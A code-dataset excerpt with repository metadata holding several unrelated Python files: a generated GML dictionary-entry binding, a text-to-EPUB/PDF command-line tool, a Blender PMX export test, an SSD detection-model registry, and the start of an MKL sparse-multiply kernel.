NIVANorge/s-enda-playground
|
56ae0a8978f0ba8a5546330786c882c31e17757a
|
[
"Apache-2.0"
] | null | null | null |
catalog/bindings/csw/dictionary_entry_type.py
|
NIVANorge/s-enda-playground
|
56ae0a8978f0ba8a5546330786c882c31e17757a
|
[
"Apache-2.0"
] | null | null | null |
catalog/bindings/csw/dictionary_entry_type.py
|
NIVANorge/s-enda-playground
|
56ae0a8978f0ba8a5546330786c882c31e17757a
|
[
"Apache-2.0"
] | null | null | null |
from dataclasses import dataclass, field
from typing import List, Optional
from bindings.csw.abstract_general_operation_parameter_ref_type import (
OperationParameterGroup,
)
from bindings.csw.actuate_type import ActuateType
from bindings.csw.base_unit import BaseUnit
from bindings.csw.cartesian_cs import CartesianCs
from bindings.csw.concatenated_operation import ConcatenatedOperation
from bindings.csw.conventional_unit import ConventionalUnit
from bindings.csw.coordinate_operation import CoordinateOperation
from bindings.csw.coordinate_reference_system import CoordinateReferenceSystem
from bindings.csw.coordinate_system import CoordinateSystem
from bindings.csw.coordinate_system_axis import CoordinateSystemAxis
from bindings.csw.crs import Crs
from bindings.csw.cylindrical_cs import CylindricalCs
from bindings.csw.datum import Datum
from bindings.csw.definition import Definition
from bindings.csw.definition_proxy import DefinitionProxy
from bindings.csw.definition_type import DefinitionType
from bindings.csw.derived_unit import DerivedUnit
from bindings.csw.ellipsoid import Ellipsoid
from bindings.csw.ellipsoidal_cs import EllipsoidalCs
from bindings.csw.engineering_crs import EngineeringCrs
from bindings.csw.engineering_datum import EngineeringDatum
from bindings.csw.general_conversion_ref_type import (
CompoundCrs,
Conversion,
DerivedCrs,
ProjectedCrs,
GeneralConversion,
GeneralDerivedCrs,
)
from bindings.csw.general_operation_parameter import GeneralOperationParameter
from bindings.csw.general_transformation import GeneralTransformation
from bindings.csw.geocentric_crs import GeocentricCrs
from bindings.csw.geodetic_datum import GeodeticDatum
from bindings.csw.geographic_crs import GeographicCrs
from bindings.csw.image_crs import ImageCrs
from bindings.csw.image_datum import ImageDatum
from bindings.csw.indirect_entry import IndirectEntry
from bindings.csw.linear_cs import LinearCs
from bindings.csw.oblique_cartesian_cs import ObliqueCartesianCs
from bindings.csw.operation_2 import Operation2
from bindings.csw.operation_method import OperationMethod
from bindings.csw.operation_parameter import OperationParameter
from bindings.csw.pass_through_operation import PassThroughOperation
from bindings.csw.polar_cs import PolarCs
from bindings.csw.prime_meridian import PrimeMeridian
from bindings.csw.reference_system import ReferenceSystem
from bindings.csw.show_type import ShowType
from bindings.csw.single_operation import SingleOperation
from bindings.csw.spherical_cs import SphericalCs
from bindings.csw.temporal_crs import TemporalCrs
from bindings.csw.temporal_cs import TemporalCs
from bindings.csw.temporal_datum import TemporalDatum
from bindings.csw.time_calendar import TimeCalendar
from bindings.csw.time_calendar_era import TimeCalendarEra
from bindings.csw.time_clock import TimeClock
from bindings.csw.time_coordinate_system import TimeCoordinateSystem
from bindings.csw.time_ordinal_reference_system import TimeOrdinalReferenceSystem
from bindings.csw.time_reference_system import TimeReferenceSystem
from bindings.csw.transformation import Transformation
from bindings.csw.type_type import TypeType
from bindings.csw.unit_definition import UnitDefinition
from bindings.csw.user_defined_cs import UserDefinedCs
from bindings.csw.vertical_crs import VerticalCrs
from bindings.csw.vertical_cs import VerticalCs
from bindings.csw.vertical_datum import VerticalDatum
__NAMESPACE__ = "http://www.opengis.net/gml"
@dataclass
class DictionaryEntryType:
"""An entry in a dictionary of definitions.
An instance of this type contains or refers to a definition object.
The number of definitions contained in this dictionaryEntry is
restricted to one, but a DefinitionCollection or Dictionary that
contains multiple definitions can be substituted if needed.
Specialized descendents of this dictionaryEntry might be restricted
in an application schema to allow only including specified types of
definitions as valid entries in a dictionary.
:ivar time_calendar_era:
:ivar time_clock:
:ivar time_calendar:
:ivar time_ordinal_reference_system:
:ivar time_coordinate_system:
:ivar time_reference_system:
:ivar operation_parameter_group:
:ivar operation_parameter:
:ivar general_operation_parameter:
:ivar operation_method:
:ivar transformation:
:ivar general_transformation:
:ivar conversion:
:ivar general_conversion:
:ivar operation:
:ivar pass_through_operation:
:ivar single_operation:
:ivar concatenated_operation:
:ivar coordinate_operation:
:ivar ellipsoid:
:ivar prime_meridian:
:ivar geodetic_datum:
:ivar temporal_datum:
:ivar vertical_datum:
:ivar image_datum:
:ivar engineering_datum:
:ivar datum:
:ivar oblique_cartesian_cs:
:ivar cylindrical_cs:
:ivar polar_cs:
:ivar spherical_cs:
:ivar user_defined_cs:
:ivar linear_cs:
:ivar temporal_cs:
:ivar vertical_cs:
:ivar cartesian_cs:
:ivar ellipsoidal_cs:
:ivar coordinate_system:
:ivar coordinate_system_axis:
:ivar compound_crs:
:ivar temporal_crs:
:ivar image_crs:
:ivar engineering_crs:
:ivar derived_crs:
:ivar projected_crs:
:ivar general_derived_crs:
:ivar geocentric_crs:
:ivar vertical_crs:
:ivar geographic_crs:
:ivar coordinate_reference_system:
:ivar crs:
:ivar reference_system:
:ivar conventional_unit:
:ivar derived_unit:
:ivar base_unit:
:ivar unit_definition:
:ivar definition_proxy:
:ivar definition_collection:
:ivar dictionary:
:ivar definition: This element in a dictionary entry contains the
actual definition.
:ivar type:
:ivar href:
:ivar role:
:ivar arcrole:
:ivar title:
:ivar show:
:ivar actuate:
:ivar remote_schema:
"""
time_calendar_era: Optional[TimeCalendarEra] = field(
default=None,
metadata={
"name": "TimeCalendarEra",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
time_clock: Optional[TimeClock] = field(
default=None,
metadata={
"name": "TimeClock",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
time_calendar: Optional[TimeCalendar] = field(
default=None,
metadata={
"name": "TimeCalendar",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
time_ordinal_reference_system: Optional[TimeOrdinalReferenceSystem] = field(
default=None,
metadata={
"name": "TimeOrdinalReferenceSystem",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
time_coordinate_system: Optional[TimeCoordinateSystem] = field(
default=None,
metadata={
"name": "TimeCoordinateSystem",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
time_reference_system: Optional[TimeReferenceSystem] = field(
default=None,
metadata={
"name": "_TimeReferenceSystem",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
operation_parameter_group: Optional[OperationParameterGroup] = field(
default=None,
metadata={
"name": "OperationParameterGroup",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
operation_parameter: Optional[OperationParameter] = field(
default=None,
metadata={
"name": "OperationParameter",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
general_operation_parameter: Optional[GeneralOperationParameter] = field(
default=None,
metadata={
"name": "_GeneralOperationParameter",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
operation_method: Optional[OperationMethod] = field(
default=None,
metadata={
"name": "OperationMethod",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
transformation: Optional[Transformation] = field(
default=None,
metadata={
"name": "Transformation",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
general_transformation: Optional[GeneralTransformation] = field(
default=None,
metadata={
"name": "_GeneralTransformation",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
conversion: Optional[Conversion] = field(
default=None,
metadata={
"name": "Conversion",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
general_conversion: Optional[GeneralConversion] = field(
default=None,
metadata={
"name": "_GeneralConversion",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
operation: Optional[Operation2] = field(
default=None,
metadata={
"name": "_Operation",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
pass_through_operation: Optional[PassThroughOperation] = field(
default=None,
metadata={
"name": "PassThroughOperation",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
single_operation: Optional[SingleOperation] = field(
default=None,
metadata={
"name": "_SingleOperation",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
concatenated_operation: Optional[ConcatenatedOperation] = field(
default=None,
metadata={
"name": "ConcatenatedOperation",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
coordinate_operation: Optional[CoordinateOperation] = field(
default=None,
metadata={
"name": "_CoordinateOperation",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
ellipsoid: Optional[Ellipsoid] = field(
default=None,
metadata={
"name": "Ellipsoid",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
prime_meridian: Optional[PrimeMeridian] = field(
default=None,
metadata={
"name": "PrimeMeridian",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
geodetic_datum: Optional[GeodeticDatum] = field(
default=None,
metadata={
"name": "GeodeticDatum",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
temporal_datum: Optional[TemporalDatum] = field(
default=None,
metadata={
"name": "TemporalDatum",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
vertical_datum: Optional[VerticalDatum] = field(
default=None,
metadata={
"name": "VerticalDatum",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
image_datum: Optional[ImageDatum] = field(
default=None,
metadata={
"name": "ImageDatum",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
engineering_datum: Optional[EngineeringDatum] = field(
default=None,
metadata={
"name": "EngineeringDatum",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
datum: Optional[Datum] = field(
default=None,
metadata={
"name": "_Datum",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
oblique_cartesian_cs: Optional[ObliqueCartesianCs] = field(
default=None,
metadata={
"name": "ObliqueCartesianCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
cylindrical_cs: Optional[CylindricalCs] = field(
default=None,
metadata={
"name": "CylindricalCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
polar_cs: Optional[PolarCs] = field(
default=None,
metadata={
"name": "PolarCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
spherical_cs: Optional[SphericalCs] = field(
default=None,
metadata={
"name": "SphericalCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
user_defined_cs: Optional[UserDefinedCs] = field(
default=None,
metadata={
"name": "UserDefinedCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
linear_cs: Optional[LinearCs] = field(
default=None,
metadata={
"name": "LinearCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
temporal_cs: Optional[TemporalCs] = field(
default=None,
metadata={
"name": "TemporalCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
vertical_cs: Optional[VerticalCs] = field(
default=None,
metadata={
"name": "VerticalCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
cartesian_cs: Optional[CartesianCs] = field(
default=None,
metadata={
"name": "CartesianCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
ellipsoidal_cs: Optional[EllipsoidalCs] = field(
default=None,
metadata={
"name": "EllipsoidalCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
coordinate_system: Optional[CoordinateSystem] = field(
default=None,
metadata={
"name": "_CoordinateSystem",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
coordinate_system_axis: Optional[CoordinateSystemAxis] = field(
default=None,
metadata={
"name": "CoordinateSystemAxis",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
compound_crs: Optional[CompoundCrs] = field(
default=None,
metadata={
"name": "CompoundCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
temporal_crs: Optional[TemporalCrs] = field(
default=None,
metadata={
"name": "TemporalCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
image_crs: Optional[ImageCrs] = field(
default=None,
metadata={
"name": "ImageCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
engineering_crs: Optional[EngineeringCrs] = field(
default=None,
metadata={
"name": "EngineeringCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
derived_crs: Optional[DerivedCrs] = field(
default=None,
metadata={
"name": "DerivedCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
projected_crs: Optional[ProjectedCrs] = field(
default=None,
metadata={
"name": "ProjectedCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
general_derived_crs: Optional[GeneralDerivedCrs] = field(
default=None,
metadata={
"name": "_GeneralDerivedCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
geocentric_crs: Optional[GeocentricCrs] = field(
default=None,
metadata={
"name": "GeocentricCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
vertical_crs: Optional[VerticalCrs] = field(
default=None,
metadata={
"name": "VerticalCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
geographic_crs: Optional[GeographicCrs] = field(
default=None,
metadata={
"name": "GeographicCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
coordinate_reference_system: Optional[CoordinateReferenceSystem] = field(
default=None,
metadata={
"name": "_CoordinateReferenceSystem",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
crs: Optional[Crs] = field(
default=None,
metadata={
"name": "_CRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
reference_system: Optional[ReferenceSystem] = field(
default=None,
metadata={
"name": "_ReferenceSystem",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
conventional_unit: Optional[ConventionalUnit] = field(
default=None,
metadata={
"name": "ConventionalUnit",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
derived_unit: Optional[DerivedUnit] = field(
default=None,
metadata={
"name": "DerivedUnit",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
base_unit: Optional[BaseUnit] = field(
default=None,
metadata={
"name": "BaseUnit",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
unit_definition: Optional[UnitDefinition] = field(
default=None,
metadata={
"name": "UnitDefinition",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
definition_proxy: Optional[DefinitionProxy] = field(
default=None,
metadata={
"name": "DefinitionProxy",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
definition_collection: Optional["DefinitionCollection"] = field(
default=None,
metadata={
"name": "DefinitionCollection",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
dictionary: Optional["Dictionary"] = field(
default=None,
metadata={
"name": "Dictionary",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
definition: Optional[Definition] = field(
default=None,
metadata={
"name": "Definition",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
type: TypeType = field(
init=False,
default=TypeType.SIMPLE,
metadata={
"type": "Attribute",
"namespace": "http://www.w3.org/1999/xlink",
},
)
href: Optional[str] = field(
default=None,
metadata={
"type": "Attribute",
"namespace": "http://www.w3.org/1999/xlink",
},
)
role: Optional[str] = field(
default=None,
metadata={
"type": "Attribute",
"namespace": "http://www.w3.org/1999/xlink",
"min_length": 1,
},
)
arcrole: Optional[str] = field(
default=None,
metadata={
"type": "Attribute",
"namespace": "http://www.w3.org/1999/xlink",
"min_length": 1,
},
)
title: Optional[str] = field(
default=None,
metadata={
"type": "Attribute",
"namespace": "http://www.w3.org/1999/xlink",
},
)
show: Optional[ShowType] = field(
default=None,
metadata={
"type": "Attribute",
"namespace": "http://www.w3.org/1999/xlink",
},
)
actuate: Optional[ActuateType] = field(
default=None,
metadata={
"type": "Attribute",
"namespace": "http://www.w3.org/1999/xlink",
},
)
remote_schema: Optional[str] = field(
default=None,
metadata={
"name": "remoteSchema",
"type": "Attribute",
"namespace": "http://www.opengis.net/gml",
},
)
@dataclass
class DefinitionMember(DictionaryEntryType):
class Meta:
name = "definitionMember"
namespace = "http://www.opengis.net/gml"
@dataclass
class DictionaryEntry(DictionaryEntryType):
class Meta:
name = "dictionaryEntry"
namespace = "http://www.opengis.net/gml"
@dataclass
class DictionaryType(DefinitionType):
"""A non-abstract bag that is specialized for use as a dictionary which
contains a set of definitions.
These definitions are referenced from other places, in the same and
different XML documents. In this restricted type, the inherited
optional "description" element can be used for a description of this
dictionary. The inherited optional "name" element can be used for
the name(s) of this dictionary. The inherited "metaDataProperty"
elements can be used to reference or contain more information about
this dictionary. The inherited required gml:id attribute allows the
dictionary to be referenced using this handle.
:ivar definition_member:
:ivar dictionary_entry: An entry in this dictionary. The content of
an entry can itself be a lower level dictionary or definition
collection. This element follows the standard GML property
model, so the value may be provided directly or by reference.
Note that if the value is provided by reference, this definition
does not carry a handle (gml:id) in this context, so does not
allow external references to this specific entry in this
context. When used in this way the referenced definition will
usually be in a dictionary in the same XML document.
:ivar indirect_entry: An identified reference to a remote entry in
this dictionary, to be used when this entry should be identified
to allow external references to this specific entry.
"""
definition_member: List[DefinitionMember] = field(
default_factory=list,
metadata={
"name": "definitionMember",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
"sequential": True,
},
)
dictionary_entry: List[DictionaryEntry] = field(
default_factory=list,
metadata={
"name": "dictionaryEntry",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
"sequential": True,
},
)
indirect_entry: List[IndirectEntry] = field(
default_factory=list,
metadata={
"name": "indirectEntry",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
"sequential": True,
},
)
@dataclass
class DefinitionCollection(DictionaryType):
class Meta:
namespace = "http://www.opengis.net/gml"
@dataclass
class Dictionary(DictionaryType):
class Meta:
namespace = "http://www.opengis.net/gml"
| 31.588988
| 81
| 0.592963
| 2,290
| 24,671
| 6.287773
| 0.117031
| 0.068616
| 0.08445
| 0.110216
| 0.401278
| 0.268838
| 0.259115
| 0.253281
| 0.162581
| 0.06299
| 0
| 0.002276
| 0.287747
| 24,671
| 780
| 82
| 31.629487
| 0.817152
| 0.140327
| 0
| 0.45827
| 0
| 0
| 0.225957
| 0.006924
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.004552
| 0.091047
| 0
| 0.213961
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a00686acf3a82fe67d9e295e22aaec66f4b36661
| 2,468
|
py
|
Python
|
txt2epub_pdf/console.py
|
drthomas246/txt2epub-pdf
|
09d12a61e0d6f66512af7fdf9abfd4b384a5c648
|
[
"MIT"
] | null | null | null |
txt2epub_pdf/console.py
|
drthomas246/txt2epub-pdf
|
09d12a61e0d6f66512af7fdf9abfd4b384a5c648
|
[
"MIT"
] | null | null | null |
txt2epub_pdf/console.py
|
drthomas246/txt2epub-pdf
|
09d12a61e0d6f66512af7fdf9abfd4b384a5c648
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from .package import txt2epub as txt2epub
from .package import txt2pdf as txt2pdf
import argparse
__version__ = "0.1.0"
def epub():
    parser = argparse.ArgumentParser(
        prog='txt2epub.exe',
        description='Convert text into an e-book (epub)'
    )
metadata = parser2metadata(parser)
epub_init = txt2epub(metadata)
print(epub_init.make())
def pdf():
    parser = argparse.ArgumentParser(
        prog='txt2pdf.exe',
        description='Convert text into a PDF'
    )
metadata = parser2metadata(parser)
pdf_init = txt2pdf(metadata)
print(pdf_init.make())
def parser2metadata(parser):
    parser._actions[0].help = 'show this help message'
    parser.add_argument('-v', '--version', action='version', version=('%(prog)s Ver.' + __version__), help='show version information')
    parser.add_argument('PATH', help='path to the input folder', metavar="PATH")
    parser.add_argument('-t', '--title', help='title', type=str, metavar='(STRINGS)')
    parser.add_argument('-a', '--author', help='author name', type=str, metavar='(STRINGS)')
    parser.add_argument('-p', '--publisher', help='publisher name', type=str, metavar='(STRINGS)')
    parser.add_argument('-tr', '--title_ruby', help='ruby (reading) for the title', type=str, metavar='(STRINGS)')
    parser.add_argument('-s', '--sub_title', help='subtitle', type=str, metavar='(STRINGS)')
    parser.add_argument('-ar', '--author_ruby', help='ruby for the author name', type=str, metavar='(STRINGS)')
    parser.add_argument('-pr', '--publisher_ruby', help='ruby for the publisher name', type=str, metavar='(STRINGS)')
    parser.add_argument('-e', '--epub_version', help='e-book version', type=int, metavar='(INTEGER)', default=1)
    parser.add_argument('-o', '--original_first_day', help='first publication date', metavar='(YYYY-MM-DD)')
    parser.add_argument('-u', '--original_url', help='URL of the original work', metavar='(URL)')
    parser.add_argument('-i', '--illustrator', help='illustrator name', type=str, metavar='(STRINGS)')
    parser.add_argument('-f', '--fiction', help='mark the work as fiction', action='store_true')
args = parser.parse_args()
metadata = dict(
path=args.PATH,
title=args.title,
author=args.author,
publisher=args.publisher,
fiction=args.fiction,
sub_title=args.sub_title,
author_ruby=args.author_ruby,
publisher_ruby=args.publisher_ruby,
illustrator=args.illustrator,
version=args.epub_version,
original_first_day=args.original_first_day,
original_url=args.original_url
)
return metadata
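# Example invocation (hypothetical paths, comments only), using the epub()
# entry point defined above:
#   txt2epub.exe ./my_novel -t "My Title" -a "Some Author"
# parser2metadata() collects the flags into the metadata dict consumed by
# txt2epub / txt2pdf.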
| 37.393939
| 120
| 0.657212
| 295
| 2,468
| 5.328814
| 0.318644
| 0.080153
| 0.151399
| 0.10687
| 0.207379
| 0.207379
| 0.207379
| 0.062341
| 0.062341
| 0
| 0
| 0.008721
| 0.163695
| 2,468
| 65
| 121
| 37.969231
| 0.752907
| 0.017423
| 0
| 0.076923
| 0
| 0
| 0.196451
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057692
| false
| 0
| 0.057692
| 0
| 0.134615
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a00725d52685ae75cf07ae5d77c3ada997c869be
| 3,150
|
py
|
Python
|
tests/test_fileio_operators.py
|
ptrthomas/blender_mmd_tools
|
8b5053b9f2e7391cb9ac1e5114824cbbfd9d80cc
|
[
"MIT"
] | 2
|
2021-01-22T05:11:50.000Z
|
2021-02-19T11:58:00.000Z
|
tests/test_fileio_operators.py
|
jiastku98/blender_mmd_tools
|
ac26c55a985d62ae9439a961d27e796444d09069
|
[
"MIT"
] | 1
|
2022-01-29T05:46:50.000Z
|
2022-01-29T05:46:50.000Z
|
tests/test_fileio_operators.py
|
yhong3/blender_mmd_tools
|
53e16a46459328bccc444c84e50f22436e9cbc11
|
[
"MIT"
] | 1
|
2021-11-07T19:41:34.000Z
|
2021-11-07T19:41:34.000Z
|
import os
import shutil
import unittest
import bpy
from mmd_tools.core import pmx
from mmd_tools.core.model import Model
TESTS_DIR = os.path.dirname(os.path.abspath(__file__))
SAMPLES_DIR = os.path.join(os.path.dirname(TESTS_DIR), 'samples')
class TestFileIoOperators(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""
Clean up output from previous tests
"""
output_dir = os.path.join(TESTS_DIR, 'output')
for item in os.listdir(output_dir):
if item.endswith('.OUTPUT'):
continue # Skip the placeholder
item_fp = os.path.join(output_dir, item)
if os.path.isfile(item_fp):
os.remove(item_fp)
elif os.path.isdir(item_fp):
shutil.rmtree(item_fp)
def setUp(self):
"""
We should start each test with a clean state
"""
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='SELECT')
bpy.ops.object.delete(use_global=True)
# Add some useful shortcuts
self.context = bpy.context
self.scene = bpy.context.scene
def test_export_shy_cube(self):
"""
This test will load the shy_cube.blend sample and check if it exports correctly.
The following checks will be made:
- The texture is properly copied to the target directory
- The material order is kept
"""
input_blend = os.path.join(SAMPLES_DIR, 'blends', 'shy_cube', 'shy_cube.blend')
if not os.path.isfile(input_blend):
self.fail('required sample file %s not found. Please download it' % input_blend)
output_pmx = os.path.join(TESTS_DIR, 'output', 'shy_cube.pmx')
bpy.ops.wm.open_mainfile(filepath=input_blend)
root = Model.findRoot(self.context.active_object)
rig = Model(root)
orig_material_names = [mat.mmd_material.name_j or mat.name for mat in rig.materials()]
try:
bpy.ops.mmd_tools.export_pmx(filepath=output_pmx)
except Exception:
self.fail("Exception happened during export")
else:
self.assertTrue(os.path.isfile(output_pmx), "File was not created") # Is this a race condition?
# Check if the texture was properly copied
tex_path = os.path.join(os.path.dirname(output_pmx), 'textures', 'blush.png')
self.assertTrue(os.path.isfile(tex_path), "Texture not copied properly")
# Load the resultant pmx file and check the material order is the expected
result_model = pmx.load(output_pmx)
result_material_names = [mat.name for mat in result_model.materials]
same_order = True
for orig, result in zip(orig_material_names, result_material_names):
if orig != result:
same_order = False
break
self.assertTrue(same_order, "Material order was lost")
if __name__ == '__main__':
import sys
sys.argv = [__file__] + (sys.argv[sys.argv.index("--") + 1:] if "--" in sys.argv else [])
unittest.main()
| 39.873418
| 108
| 0.626349
| 417
| 3,150
| 4.558753
| 0.364508
| 0.047344
| 0.031562
| 0.016833
| 0.092583
| 0.049448
| 0
| 0
| 0
| 0
| 0
| 0.000438
| 0.274921
| 3,150
| 78
| 109
| 40.384615
| 0.831874
| 0.149206
| 0
| 0
| 0
| 0
| 0.101472
| 0
| 0
| 0
| 0
| 0
| 0.054545
| 1
| 0.054545
| false
| 0
| 0.127273
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a00cf121c8cf260456f4a0552e06a0dd6ae84b59
| 1,070
|
py
|
Python
|
cv_lib/detection/models/__init__.py
|
zhfeing/deep-learning-lib-PyTorch
|
1a4e1c1939a42c30fe32dd8d6aff210e8604e77b
|
[
"MIT"
] | 4
|
2021-03-29T07:34:21.000Z
|
2021-04-25T08:25:30.000Z
|
cv_lib/detection/models/__init__.py
|
zhfeing/deep-learning-lib
|
f96e3a71ae2dbeb44696725ec127ff8f37d4c6e9
|
[
"MIT"
] | null | null | null |
cv_lib/detection/models/__init__.py
|
zhfeing/deep-learning-lib
|
f96e3a71ae2dbeb44696725ec127ff8f37d4c6e9
|
[
"MIT"
] | 1
|
2021-03-30T07:13:31.000Z
|
2021-03-30T07:13:31.000Z
|
from functools import partial
from typing import Dict
import copy
from torch.nn import Module
from torchvision.models.resnet import *
from .ssd_resnet import SSD300_ResNet
from .ssd_vgg import SSD300_VGG16
from .backbones import *
__REGISTERED_MODELS__ = {
"SSD300_ResNet": SSD300_ResNet,
"SSD300_VGG16": SSD300_VGG16
}
__REGISTERED_BACKBONES__ = {
"ResNetBackbone": ResNetBackbone,
"VGGBackbone": VGGBackbone
}
def _get_model_instance(name):
    try:
        return __REGISTERED_MODELS__[name]
    except KeyError:
        raise Exception("Model {} not available".format(name))
def get_model_partial(model_cfg, n_classes: int) -> partial:
model_dict: Dict = copy.deepcopy(model_cfg)
name = model_dict.pop("arch")
model = _get_model_instance(name)
return partial(model, n_classes=n_classes, **model_dict)
def get_backbone(backbone_config) -> Backbone:
backbone_dict = copy.deepcopy(backbone_config)
t = backbone_dict.pop("type")
return __REGISTERED_BACKBONES__[t](**backbone_dict)
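# A minimal usage sketch (hypothetical config values; the real schema comes
# from the surrounding project, comments only):
#   model_cfg = {"arch": "SSD300_VGG16"}          # extra keys are forwarded
#   build = get_model_partial(model_cfg, n_classes=21)
#   model = build()  # instantiates SSD300_VGG16(n_classes=21)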
| 24.883721
| 63
| 0.715888
| 128
| 1,070
| 5.59375
| 0.351563
| 0.050279
| 0.050279
| 0.055866
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027939
| 0.197196
| 1,070
| 42
| 64
| 25.47619
| 0.805588
| 0
| 0
| 0
| 0
| 0
| 0.077897
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.266667
| 0
| 0.466667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a0100c7225ae95c3cbbf519ce214f82cef36e0ce
| 733
|
py
|
Python
|
csr/kernels/mkl/multiply.py
|
mdekstrand/csr
|
665ceefff882d7e42db41034246b6ddb1f93e372
|
[
"MIT"
] | 11
|
2021-02-07T16:37:31.000Z
|
2022-03-19T15:19:16.000Z
|
csr/kernels/mkl/multiply.py
|
mdekstrand/csr
|
665ceefff882d7e42db41034246b6ddb1f93e372
|
[
"MIT"
] | 25
|
2021-02-11T22:42:01.000Z
|
2022-01-27T21:04:31.000Z
|
csr/kernels/mkl/multiply.py
|
lenskit/csr
|
03fde2d8c3cb7eb330028f34765ff2a06f849631
|
[
"MIT"
] | 2
|
2021-02-07T02:05:04.000Z
|
2021-06-01T15:23:09.000Z
|
import numpy as np
from numba import njit
from ._api import * # noqa: F403
from .handle import mkl_h
__all__ = [
'mult_ab',
'mult_abt'
]
@njit(nogil=True)
def mult_ab(a_h, b_h):
if a_h.H and b_h.H:
h = lk_mkl_spmab(a_h.H, b_h.H)
else:
h = 0
return mkl_h(h, a_h.nrows, b_h.ncols, None)
@njit(nogil=True)
def mult_abt(a_h, b_h):
